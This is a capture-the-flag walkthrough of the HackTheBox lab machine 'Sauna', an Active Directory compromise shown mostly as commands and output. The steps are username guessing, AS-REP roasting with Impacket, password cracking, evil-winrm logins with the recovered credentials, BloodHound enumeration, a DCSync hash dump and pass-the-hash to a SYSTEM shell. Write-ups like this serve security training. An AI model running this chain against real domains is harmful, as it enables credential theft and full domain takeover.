Sauna was quite a fun and interesting machine to do provided by HackTheBox aiming to teach you some basic concepts about Red Teaming and Active Directory Exploitation. User comes with a pretty real life vector attack where some workers are presented on a Bank webpage where we had to guess their usernames based on the Full Names provided on the webpage. Root represents an usual mistake while setting user privilege where an user in the machine has DCSync rights over the domain.


As the default routine I would start with a nmap scan to check for the interesting results.

[email protected]:~$ nmap -sC -A
Starting Nmap 7.80 ( ) at 2020-07-24 23:26 CEST
Nmap scan report for
Host is up (0.079s latency).
Not shown: 988 filtered ports
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-07-25 04:30:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h03m17s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-07-25T04:32:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 326.61 seconds

The ports provided to be open , makes it easy to guess that We have to do with an Active Directory environiment. Beside that we are provided with a http webpage where we can possibly gain some information needed for usual exploitation.



We are simply provided with a webpage representing a bank with not much interesting information except the about us part :


We can notice the names of the workers easily under each of their picture. I saved the names for lateral use thinking they will be useful and started to google about the username format that is mostly used on an AD environiment and luckily came up with this :


As seen above from a forum reply I found somewhere , the usual format for an username would be : First Letter of the First Name + Last Name (ex. Fergus Smith = fsmith) Following this order , I tried to generate usernames based on the names provided to us and saved them to a file.

Next guess since this is presented as an easy box , we could try kerberoasting against the usernames created and see if we could hit somewhere :

[email protected]:/usr/share/doc/python3-impacket/examples$ python3 EGOTISTICAL-BANK.LOCAL/ -no-pass -request -usersfile /home/alt/userlist-sauna.txt -dc-ip
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[email protected]:04df0f9e2335fe90b76c55592d51ca6c$bfe1299b17d8402cd72f883eb7d44b5a7db37df877747193d74b932493bcc630519793f08561c8ecc99bcc919acad3ad8765451757711f69426da93f5841019d4091154dbe3cc75b937d92c5848a673204cc433d40808ed8e978519124dbc649c025c6c2825f0e823d585b9287f82ff801883407b275030c358a7d7cf863dbc60c2170717e4090be13195738bb488a183039327da6666b3d6f4bb41f6acea2056da91989f578ad4b5687138bf9913e7ada84f4d9263b13eb463d99d7b099d01d5bc5d3217c0a0b76a64b6fa9a0809d7990ad5e6f05a25abd063727429088a6e99331008dde7d5ffa515e9ca4f6d2dbf80cd500e4e4c0971db046886d0285f7c6
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[email protected]:/usr/share/doc/python3-impacket/examples$

And there we go, a hash provided from the attack which we can possibly use to login for the user fsmith

Let’s go ahead and save the hash to a file then use john or hashcat to crack it and come up with a plaintext password :


Password Cracked : Thestrokes23

Now we can finally try to use the credentials against the winrm protocol since we noticed its up and running on its default port :

[email protected]:~$ evil-winrm -i -u fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> type ../Desktop/user.txt
*Evil-WinRM* PS C:\Users\FSmith\Documents> 

Succesfully logged in as expected and with that I am free to grab the user hash and start working for lateral movement on the machine.

Lateral Movement

After getting one foot inside the machine I would like to run WinPeas (Enumeration Tool for Windows Privilege Escalation) to check for possible paths since I wasnt able to figure out a way manually :


After running , some credentials popped for an AD user : svc_loanmgr:Moneymakestheworldgoround!

[email protected]:~# evil-winrm -i -u svc_loanmgr -p 'Moneymakestheworldgoround!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /opt/pentesting/BloodHound/Ingestors/SharpHound.exe
Info: Uploading /opt/pentesting/BloodHound/Ingestors/SharpHound.exe to C:\Users\svc_loanmgr\Documents\SharpHound.exe

Data: 1111380 bytes of 1111380 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> .\SharpHound.exe
Initializing SharpHound at 1:22 PM on 7/11/2020

I was able to login with the user credentials and ran Bloodhound as seen above to find a possible path to Administrator After the dump was complete I imported the database to my machine to check the domain forest relations to the Administrating Account.


Quickly I noticed this relation of my current account (svc_loanmgr) with the domain. I have GetChanges and GetChangesAll Permission over the domain which could let me dump a list of NTLM hashes from the system.

I can simply use from Impacket to do that.

[email protected]:~# /usr/share/doc/python3-impacket/examples/ [email protected]
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...

Gaining System Shell

After all of the hashes have been dumped what I need to use is the Administrator hash to grab a system shell in the machine and own the forest :

[email protected]:~# /usr/share/doc/python3-impacket/examples/ [email protected] -hashes d9485863c1e9e05851aa40cbb4ab9dff:d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file GNRWPFak.exe
[*] Opening SVCManager on
[*] Creating service APMT on
[*] Starting service APMT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

nt authority\system

C:\Windows\system32>type \users\administrator\desktop\root.txt

I am succesfully logged in as the domain admin and I can use the hash to mark the machine as owned!

Leave a comment